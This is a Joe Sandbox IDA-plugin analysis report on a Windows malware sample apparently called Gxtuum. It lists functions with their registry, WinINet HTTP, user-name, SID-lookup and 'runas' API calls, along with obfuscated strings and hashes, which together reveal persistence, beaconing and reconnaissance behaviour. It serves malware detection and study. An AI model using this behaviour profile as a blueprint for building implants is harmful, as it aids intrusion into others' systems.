Part of subcall function 000E61F0: RegCloseKey.KERNELBASE(455139FB,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63D6

GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 000EB8B5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 000EB9EF

Part of subcall function 000E61F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 000E64E3
Part of subcall function 000E61F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 000E6511
Part of subcall function 000E61F0: RegCloseKey.ADVAPI32(80000001), ref: 000E651A

GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 000EBB29
GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 000EBC63

Part of subcall function 000E61F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 000E663C
Part of subcall function 000E61F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 000E665F
Part of subcall function 000E61F0: RegCloseKey.ADVAPI32(80000002), ref: 000E6668

GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 000EBD9D
GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 000EBED7

Part of subcall function 000E61F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 000E67BD

GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 000EC011

Part of subcall function 000E61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 000E6894
Part of subcall function 000E61F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 000E68E0

GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 000EC14B
GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 000EC285
GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 000EC3BF

Part of subcall function 000E61F0: RegCloseKey.ADVAPI32(?), ref: 000E6D5E

GetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 000EC4FF

Part of subcall function 000E93D0: GetVersionExW.KERNEL32(0000011C,455139FB,74DF0F00), ref: 000E944A
Part of subcall function 000E93D0: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E94AB
Part of subcall function 000E93D0: GetProcAddress.KERNEL32(00000000), ref: 000E94B2

Part of subcall function 000E93D0: GetNativeSystemInfo.KERNELBASE(?), ref: 000E9573

Part of subcall function 000E93D0: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E9577

Strings

XU9q9w0D, xrefs: 000EC37C
TU9n SIz, xrefs: 000EC4B6
UNNzTq==, xrefs: 000EBAE6
TPZjacv=, xrefs: 000EB872
We9sbw0y, xrefs: 000EC242
TNZB, xrefs: 000EBE94

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: AttributesFile$CloseOpenValue$Info$QuerySystem$AddressEnumHandleModuleNativePathProcTempVersion
String ID: TNZB$TPZjacv=$TU9n SIz$UNNzTq==$We9sbw0y$XU9q9w0D
API String ID: 3951112935-471495615
Opcode ID: 4f35b8bdafbccf485c791664a2dfba41c061b19c24017cffc698f4d622c46b61
Instruction ID: c556114593032ae7d28ce16bbb8c0aae69335794b519202e093846e7b19585f2
Opcode Fuzzy Hash: 4f35b8bdafbccf485c791664a2dfba41c061b19c24017cffc698f4d622c46b61
Instruction Fuzzy Hash: B0924B71A002889FEF18DB79CD89BEEBB71AF45310F64821CE050B73D6D7B65A818B51

Function 000EE8D0 Relevance: 25.3, APIs: 7, Strings: 7, Instructions: 764
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32(?,?), ref: 000EE91D
CoInitialize.OLE32(00000000), ref: 000EEC54
CoCreateInstance.OLE32(0013DFEC,00000000,00000001,0013E04C,?), ref: 000EEC73
CoUninitialize.OLE32 ref: 000EEC81
CoUninitialize.OLE32 ref: 000EF055
CoUninitialize.OLE32 ref: 000EF06C
CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 000EF455

Strings

Xw9NTq==, xrefs: 000F0036, 000F0698
dzRUatfzLr==, xrefs: 000F0B62, 000F0DC4
@3P, xrefs: 000EF3EE
OK0HA7==, xrefs: 000EFD73
OK0nJIRx, xrefs: 000EFAFE
dzRUaxD Lt6=, xrefs: 000F0C03
GIonJIRxLNY=, xrefs: 000EFD9D

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: Uninitialize$CreateInitializeInstanceNameUser
String ID: @3P$GIonJIRxLNY=$OK0HA7==$OK0nJIRx$Xw9NTq==$dzRUatfzLr==$dzRUaxD Lt6=
API String ID: 1775936440-1339055660
Opcode ID: 27c526320a1d53a7e8714c6ff2a8abc3b667f40c7553532ad2cfa2f9ef7088c5
Instruction ID: 29f9de5920c34a5c50c6ace5dee5530a84e1e1b5c83468e0afdbcfa331ce3ecf
Opcode Fuzzy Hash: 27c526320a1d53a7e8714c6ff2a8abc3b667f40c7553532ad2cfa2f9ef7088c5
Instruction Fuzzy Hash: 5B62AC71A002999FDF24DF24CC88BDDBBB9AF49304F5081E8E409A7292DB759B84CF51

Function 000FEB10 Relevance: 51.4, APIs: 4, Strings: 24, Instructions: 2430registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000F05B0: Sleep.KERNELBASE(000005DC,455139FB,?,00000000), ref: 000F0642
Part of subcall function 000F05B0: InternetOpenW.WININET(0013DB90,00000000,00000000,00000000,00000000), ref: 000F0651
Part of subcall function 000F05B0: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 000F0675
Part of subcall function 000F05B0: HttpOpenRequestA.WININET(?,00000000), ref: 000F06BF

Part of subcall function 000E61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,455139FB,455139FB), ref: 000E639C
Part of subcall function 000E61F0: RegQueryValueExA.KERNELBASE(455139FB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63CA
Part of subcall function 000E61F0: RegCloseKey.KERNELBASE(455139FB,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63D6

Part of subcall function 000E61F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 000E64E3
Part of subcall function 000E61F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 000E6511
Part of subcall function 000E61F0: RegCloseKey.ADVAPI32(80000001), ref: 000E651A

RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 000FF832
RegCloseKey.KERNELBASE(80000002), ref: 000FF848

Part of subcall function 000E61F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 000E663C
Part of subcall function 000E61F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 000E665F
Part of subcall function 000E61F0: RegCloseKey.ADVAPI32(80000002), ref: 000E6668

GetUserNameA.ADVAPI32(?,80000002), ref: 000FF8D2
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 000FF95D

Part of subcall function 000E61F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 000E67BD

Part of subcall function 000E61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 000E6894
Part of subcall function 000E61F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 000E68E0

Part of subcall function 000E61F0: RegCloseKey.ADVAPI32(?), ref: 000E6D5E

Part of subcall function 000E61F0: GdiplusStartup.GDIPLUS(?,?,00000000,455139FB,00000000), ref: 000E6DEA

Part of subcall function 000E61F0: GetDC.USER32(00000000), ref: 000E6F62

Strings

fUQ0, xrefs: 000FFB73
1PI0, xrefs: 000FFAEB
246122658369, xrefs: 000FF79B, 000FFBC7
SyM+, xrefs: 000FEFF7, 000FF06E, 000FF311, 000FF388
Lo==, xrefs: 000FF5A4
1PY0, xrefs: 000FFA33
fyM0, xrefs: 000FFABD
eVM0, xrefs: 000FFB47
stoi argument out of range, xrefs: 000FF728
fb0=, xrefs: 00100A7F
SyQ+, xrefs: 000FF03E, 000FF16B, 000FF358, 000FF485
QK4rKq==, xrefs: 000FFB90
ezY0, xrefs: 000FFA05
invalid stoi argument, xrefs: 000FF719
gfM0, xrefs: 000FFBAD
dOQ0, xrefs: 000FFBD5
2y00, xrefs: 000FFA61
gO40, xrefs: 000FFA8F
eUc0, xrefs: 000FF9CD
0f3be6, xrefs: 000FFB65
System, xrefs: 000FF828
R, xrefs: 00100A99
fVQ3am==, xrefs: 000FEF93
1ek0, xrefs: 000FFB19

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: Open$Close$Value$InternetNameQuery$ConnectEnumFileGdiplusHttpInfoModuleRequestSleepStartupUser
String ID: 0f3be6$1PI0$1PY0$1ek0$246122658369$2y00$Lo==$QK4rKq==$R$SyM+$SyQ+$System$dOQ0$eUc0$eVM0$ezY0$fUQ0$fVQ3am==$fb0=$fyM0$gO40$gfM0$invalid stoi argument$stoi argument out of range
API String ID: 2912196086-31716519
Opcode ID: 060c324126204da842a24fa4f05748561c85416ea5b4dc73349326312a2ffc31
Instruction ID: 43db2b1fa9ee3504b6cb4e4ebcbde66b741484f9ef50d73bb229eb5f40031251
Opcode Fuzzy Hash: 060c324126204da842a24fa4f05748561c85416ea5b4dc73349326312a2ffc31
Instruction Fuzzy Hash: 5D133571A002489BEB19DB28CD897EDBB76AF55304F5481DCE048A72D2DBB58FC48F91

Function 000FF750 Relevance: 40.1, APIs: 4, Strings: 18, Instructions: 1574registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000E61F0: GetUserNameA.ADVAPI32(?,?), ref: 000E75BA
Part of subcall function 000E61F0: LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 000E7600
Part of subcall function 000E61F0: GetSidIdentifierAuthority.ADVAPI32(?), ref: 000E760D

RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 000FF832
RegCloseKey.KERNELBASE(80000002), ref: 000FF848
GetUserNameA.ADVAPI32(?,80000002), ref: 000FF8D2
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 000FF95D

Part of subcall function 000E61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,455139FB,455139FB), ref: 000E639C
Part of subcall function 000E61F0: RegQueryValueExA.KERNELBASE(455139FB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63CA
Part of subcall function 000E61F0: RegCloseKey.KERNELBASE(455139FB,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63D6

Part of subcall function 000E61F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 000E64E3
Part of subcall function 000E61F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 000E6511
Part of subcall function 000E61F0: RegCloseKey.ADVAPI32(80000001), ref: 000E651A

Part of subcall function 000E61F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 000E663C
Part of subcall function 000E61F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 000E665F
Part of subcall function 000E61F0: RegCloseKey.ADVAPI32(80000002), ref: 000E6668

Strings

fUQ0, xrefs: 000FFB73
1PI0, xrefs: 000FFAEB
1PY0, xrefs: 000FFA33
246122658369, xrefs: 000FF79B, 000FFBC7
fyM0, xrefs: 000FFABD
eVM0, xrefs: 000FFB47
fb0=, xrefs: 00100A7F, 00100B9D
QK4rKq==, xrefs: 000FFB90
ezY0, xrefs: 000FFA05
gfM0, xrefs: 000FFBAD
dOQ0, xrefs: 000FFBD5
2y00, xrefs: 000FFA61
gO40, xrefs: 000FFA8F
eUc0, xrefs: 000FF9CD
System, xrefs: 000FF828
0f3be6, xrefs: 000FFB65
V, xrefs: 00100BB7
1ek0, xrefs: 000FFB19

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: CloseNameOpen$Value$User$AccountAuthorityFileIdentifierLookupModuleQuery
String ID: 0f3be6$1PI0$1PY0$1ek0$246122658369$2y00$QK4rKq==$System$V$dOQ0$eUc0$eVM0$ezY0$fUQ0$fb0=$fyM0$gO40$gfM0
API String ID: 4106312383-4174728819
Opcode ID: c6bee32f76215f547a538e1b70de2b630ad70d8f7e4cb0f2efa946d6bf24e5f3
Instruction ID: 799871798471a6e2c06b6f4dfd913f7dd86c60270f0b65e842824152d7875cbe
Opcode Fuzzy Hash: c6bee32f76215f547a538e1b70de2b630ad70d8f7e4cb0f2efa946d6bf24e5f3
Instruction Fuzzy Hash: 62D236709001589BEB2ADB28CD997EDBB36AF85304F5481DCE088A72D6DBB54FC48F51

Function 000F05B0 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 312
networkfilesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000005DC,455139FB,?,00000000), ref: 000F0642
InternetOpenW.WININET(0013DB90,00000000,00000000,00000000,00000000), ref: 000F0651
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 000F0675
HttpOpenRequestA.WININET(?,00000000), ref: 000F06BF
HttpSendRequestA.WININET(?,00000000), ref: 000F077F
InternetReadFile.WININET(?,?,000003FF,?), ref: 000F0831
InternetReadFile.WININET(?,00000000,000003FF,?), ref: 000F08E0
InternetCloseHandle.WININET(?), ref: 000F0907
InternetCloseHandle.WININET(?), ref: 000F090F
InternetCloseHandle.WININET(?), ref: 000F0917

Strings

invalid stoi argument, xrefs: 000F2B44
Xw9NTq==, xrefs: 000F0036, 000F0698
dzRUatfzLr==, xrefs: 000F0B62, 000F0DC4
stoi argument out of range, xrefs: 000F2B3A
dzRUaxD Lt6=, xrefs: 000F0C03

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendSleep
String ID: Xw9NTq==$dzRUatfzLr==$dzRUaxD Lt6=$invalid stoi argument$stoi argument out of range
API String ID: 1439999335-2705372248
Opcode ID: aa4bdd841eb6a412585ecb6626946cf1c70f4138dc69fe8963fb331f64c4e51a
Instruction ID: 804b89c8a8863519ab22080c7233b34980b8ce6b0a325ad9650eafee4e1c9443
Opcode Fuzzy Hash: aa4bdd841eb6a412585ecb6626946cf1c70f4138dc69fe8963fb331f64c4e51a
Instruction Fuzzy Hash: 53B1D7B1A002589FDB24DF28CC88BAE7BB5EF41304F504198F649976D2DB759AC0CF95

Function 000E93D0 Relevance: 18.0, APIs: 6, Strings: 4, Instructions: 473
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,455139FB,74DF0F00), ref: 000E944A
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E94AB
GetProcAddress.KERNEL32(00000000), ref: 000E94B2
GetNativeSystemInfo.KERNELBASE(?), ref: 000E9573
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E9577

Strings

PbAsK7==, xrefs: 000E97DA
PbArMG==, xrefs: 000E9732
PbAsLG==, xrefs: 000E9882
PbArL7==, xrefs: 000E992A

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: InfoSystem$AddressHandleModuleNativeProcVersion
String ID: PbArL7==$PbArMG==$PbAsK7==$PbAsLG==
API String ID: 374719553-3352537439
Opcode ID: d6a743102f6c8192f7641e7ef93aef64451b812b8b0f9a94cd623e403b66da41
Instruction ID: 3326acc173823a7f0debd4e3ae66a417b560596d5f3cee7faab22d5415e157eb
Opcode Fuzzy Hash: d6a743102f6c8192f7641e7ef93aef64451b812b8b0f9a94cd623e403b66da41
Instruction Fuzzy Hash: B70206B1E00284AFDF24AB29DC573AD7B71AB46314F54429CE841A73D3DB754E848BC2

Function 00123E8F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00123B48: CreateFileW.KERNELBASE(00000000,00000000,?,00123F38,?,?,00000000,?,00123F38,00000000,0000000C), ref: 00123B65

GetLastError.KERNEL32 ref: 00123FA3
__dosmaperr.LIBCMT ref: 00123FAA
GetFileType.KERNELBASE(00000000), ref: 00123FB6
GetLastError.KERNEL32 ref: 00123FC0
__dosmaperr.LIBCMT ref: 00123FC9
CloseHandle.KERNEL32(00000000), ref: 00123FE9
CloseHandle.KERNEL32(001177E1), ref: 00124136
GetLastError.KERNEL32 ref: 00124168
__dosmaperr.LIBCMT ref: 0012416F

Strings

H, xrefs: 001240F4

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 7bfacfbd5f306d134af0df6355f370a7aed2cfd0177be88c4acbb999a230ea4d
Instruction ID: 0f51b71f29007d5abd0954c1de1e64083b4601f2b3da468afe763477bc35d004
Opcode Fuzzy Hash: 7bfacfbd5f306d134af0df6355f370a7aed2cfd0177be88c4acbb999a230ea4d
Instruction Fuzzy Hash: 3DA15632A001649FCF1D9F68EC517EE7BA1AF16320F180159F815EF2A1CB359DA6CB52

Function 000E89E0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 322
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064,455139FB,?,00000000,001294DD,000000FF), ref: 000E8A1C
__Init_thread_footer.LIBCMT ref: 000E8AB6

Part of subcall function 00109E88: EnterCriticalSection.KERNEL32(00148FA8,74DF0F00,?,000E8ABB,0014CDC0,00130580), ref: 00109E92
Part of subcall function 00109E88: LeaveCriticalSection.KERNEL32(00148FA8,?,000E8ABB,0014CDC0,00130580), ref: 00109EC5
Part of subcall function 00109E88: WakeAllConditionVariable.KERNEL32(?,0014CDC0,00130580), ref: 00109F3C

CreateThread.KERNEL32(00000000,00000000,000E8880,0014C578,00000000,00000000), ref: 000E8B1B
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000E8B26

Part of subcall function 00109ED2: EnterCriticalSection.KERNEL32(00148FA8,00000000,74DF0F00,?,000E8A41,0014CDC0), ref: 00109EDD
Part of subcall function 00109ED2: LeaveCriticalSection.KERNEL32(00148FA8,?,000E8A41,0014CDC0), ref: 00109F1A

Strings

runas, xrefs: 000E8753

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: CriticalSection$EnterLeaveSleep$ConditionCreateInit_thread_footerThreadVariableWake
String ID: runas
API String ID: 4065365256-4000483414
Opcode ID: 8d4d660a4a93dc0b0f02e5d955f68f1920475301d052463e8b7e5f1ba027bbdd
Instruction ID: b1eac1b6672620e5cca3df83b5c86afaa4535115a683e1f2e1e90e5fdc66330b
Opcode Fuzzy Hash: 8d4d660a4a93dc0b0f02e5d955f68f1920475301d052463e8b7e5f1ba027bbdd
Instruction Fuzzy Hash: A0B14B71600248AFEB08DF28DD89B9D7B65EF45304F50821CF855AB7D1DBB5E9C08B91

Function 000E9A20 Relevance: 7.7, APIs: 5, Instructions: 155
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,?,455139FB,00000000), ref: 000E9A99
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E9B00
GetProcAddress.KERNEL32(00000000), ref: 000E9B07
GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E9BC4

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: AddressHandleInfoModuleNativeProcSystemVersion
String ID:
API String ID: 2167034304-0
Opcode ID: 01920ab6ca320ed102254d490e8cd7bac5f1763064ae1953961b925175e67247
Instruction ID: b8a5d84292d5f67c145da9afd0099f7395e6fd822e60d0df30a262ccbf444220
Opcode Fuzzy Hash: 01920ab6ca320ed102254d490e8cd7bac5f1763064ae1953961b925175e67247
Instruction Fuzzy Hash: DA5127709142889FDB24EB29DE497DDBB75EF45310F5042A8E805A72D1EB704AC0CB91

Function 00110BFC Relevance: 7.6, APIs: 5, Instructions: 141
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00110B2E), ref: 00110C1E
GetFileInformationByHandle.KERNELBASE(?,?), ref: 00110C78
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00110B2E,?,000000FF,00000000,00000000), ref: 00110D06
__dosmaperr.LIBCMT ref: 00110D0D
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00110D4A

Part of subcall function 00110F72: __dosmaperr.LIBCMT ref: 00110FA7

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: d008fde627b3c0de913dfc397804606769df85077dfdc18d9e7578d75bb344f0
Instruction ID: 3716f6dd041ed6623868c3c0883e798dcf79b5caefb4e3dead37e92231efa9da
Opcode Fuzzy Hash: d008fde627b3c0de913dfc397804606769df85077dfdc18d9e7578d75bb344f0
Instruction Fuzzy Hash: 30412C75900208ABCF29DFE5EC459EBBBF9EF89300B144529F956D3611EB71A980CB21

Function 000F9640 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 284
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00002710,455139FB,00000000,?), ref: 000F9679

Part of subcall function 000EA470: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,455139FB,00000000,?), ref: 000EA4BA

GetFileAttributesA.KERNELBASE(?,?,00000000,00000000,00147494,0000000E), ref: 000F96F5

Strings

0s==, xrefs: 000F9962
2yxm, xrefs: 000F9928

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: AttributesFileFolderPathSleep
String ID: 0s==$2yxm
API String ID: 70540035-2047973060
Opcode ID: 0ae4f09eb7e8111407a6397a61acafaf0afb2b3af22e8ea165f661e52f60c14e
Instruction ID: b5bb013c8b84eeedd576bc413404d47c2411066b488e99daba1e8d268d8278b4
Opcode Fuzzy Hash: 0ae4f09eb7e8111407a6397a61acafaf0afb2b3af22e8ea165f661e52f60c14e
Instruction Fuzzy Hash: AEC1CF70D0428CDFEF14DBA8C948BEEBFB6AF51304F248198D444272D2D7B55A84DBA1

Function 000E91B0 Relevance: 6.3, APIs: 4, Instructions: 324
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,455139FB,74DF0F00), ref: 000E944A
